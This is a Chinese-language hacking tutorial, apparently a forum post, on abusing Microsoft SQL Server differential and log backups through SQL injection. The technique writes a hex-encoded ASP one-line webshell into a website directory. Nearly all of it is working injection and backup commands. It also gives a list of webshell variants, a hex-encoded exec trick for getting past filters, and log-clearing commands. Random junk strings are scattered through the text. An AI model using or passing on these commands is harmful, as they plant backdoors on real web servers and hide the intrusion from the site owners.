MSsql差异备份总结

admin

差异备份的流程大概这样：
- E! g# r+ E9 N+ f4 d1.完整备份一次(保存位置当然可以改)
! M9 z& Q! j3 v: wbackup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
) z/ A  y& k; m/ p8 C$ @create table [dbo].[dtest] ([cmd] [image]);
4 j# X" y" v3 binsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

. }4 p/ b& b' u. k7 r2 B( x- N4 l3.进行差异备份
* g- z3 c0 n- e; r; |; J' {9 ?4 q2 zbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
& t6 ]8 v+ F1 I. b. j5 k
$ B; C  ^$ ^# w+ T4 Y, o$ O上面
9 \' R3 N7 p0 u7 T. k0x3C25657865637574652872657175657374282261222929253E
1 E# d6 A4 R; e! F就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
2 V  v. X9 t% n! L6 O5 F3 x+ N8 a/ a===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
3 _  d: |( X2 ?  N! h- ]4 u% s
5 G$ K  `' E1 ~: k$ mdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

create table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

% A6 K# w+ O6 L! Q" @# [
: u, B5 _6 ?. Y  Z" g! sinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
$ L  B9 q. B% j/ b4 G6 m+ L
. p, |8 b1 c1 Y- u+ c+ F. I0 Rdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

drop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
- {* d5 E6 ~+ x0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
6 r& b* x" }9 G% R. |& ^8 W===============================================================
: g* E* g5 {5 f
: z' N3 y* B, @0 r' y" [我发现上面代码，有时会无效，而直接用

4 |% V, A3 y1 |  k/ Ebackup database 库名 to disk = 'c:\ddd.bak'

0 ?) q( ?& _1 p$ n2 u2 Qcreate table [dbo].[dtest] ([cmd] [image]);

( ^8 c# u1 J+ q2 P6 x& minsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 m0 ^& z$ S) f; ~
3 q9 a! R' z. Y2 \backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

- |9 d6 A/ x2 Z" N9 @, H- w却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
6 Q3 h6 I8 Q8 J# d
0 i* n+ A' Z- @1 |  c, T库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
6 F& O$ U1 Y: F
网上还有log增量备份的，我也把他记录一下
=====================================================
% j& P% W. E; B) G3 G  `) z另一种log增量备份技术:
5 @, u- ^, h# s5 Z/ B: |7 P0 k8 K
5 n) P2 }9 X' r2 J1 G  A';alter database null set RECOVERY FULL--
7 L, r+ E6 E+ z7 d9 ]' R) X+ z
';create table cmd (a image)--

3 R( m% K0 [' q$ v3 z7 n6 A1 `';backup log null to disk = 'f:\cmd' with init--
' t5 O  p6 X. e: u
& M# r& p" x( B. R% r, C';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# I$ W. M& y% U; I. |% j
% i) S: A4 t: B1 G7 e+ ]! N';backup log null to disk = '备份路径'--

7 X! b8 Q: X* y4 O) R6 t: B, W';drop table cmd--
& i8 A7 ]) ~% v; P8 c3 x) I
';alter database XXX set RECOVERY SIMPLE--

  j) o  ^# Z' ~8 qPS:0x3C2565786563757465287265717565737428226122292
2 b8 @( n5 A5 _3 j% A1 s4 }9253EDA 是一句话小马16进制转来的
' H; R) g$ ?/ `
4 T5 ?* f( H; @6 S, {8 ^说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
1 K: q1 I( {  |8 U5 ^# @* kc)%><%execute request("a")%><%
% W7 k, F0 r& U7 Rd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
# z) o6 g5 C4 ~+ `* ~, @( ^- T& Yf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
: s- u6 G& R9 Z8 q0 O& q3 _9 v; gh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
3 H" a! f% Z/ {$ X, LI)<%eval request(0)%>
7 g' q2 E6 y0 [+ H* F8 ^; }J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

, w* o. I0 F% H& Q* @=============================================

' o( b' Z" e& m# g4 c2 y' L% W当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
# s- G# R! E8 [& }  o! w
9 K8 A! t) |8 S0 T: c8 O4 z把要执行的语句转16进制然后用exec执行
3 ^. f) P+ A" i, a, a6 u& X
' u- N( s0 u2 v7 Y9 h: I
减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
% Q3 }# H$ s+ ]5 k. ^- iid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
- i' [- W2 L& r7 _% J
2 ^+ \- D' A5 [% d- ~! p
( Y+ S! V, M" Z& a
SQL语句清理日志
$ O4 |. y. E3 Q) }8 t& Z注：test为数据库名

--清空日志
/ Z/ I$ W( M% d- B0 U9 nDUMP TRANSACTION test WITH NO_LOG
+ J6 `: m; g0 ?
--截断事务日志
4 {9 O3 x9 B* s: YBACKUP LOG test WITH NO_LOG

, ]) c) u* F: _% ~0 O& b--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
$ U; K0 n* R0 E1 h) NSelect * from sysfiles DBCC SHRINKFILE(1)

& w) ^* [5 `# ~$ H--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'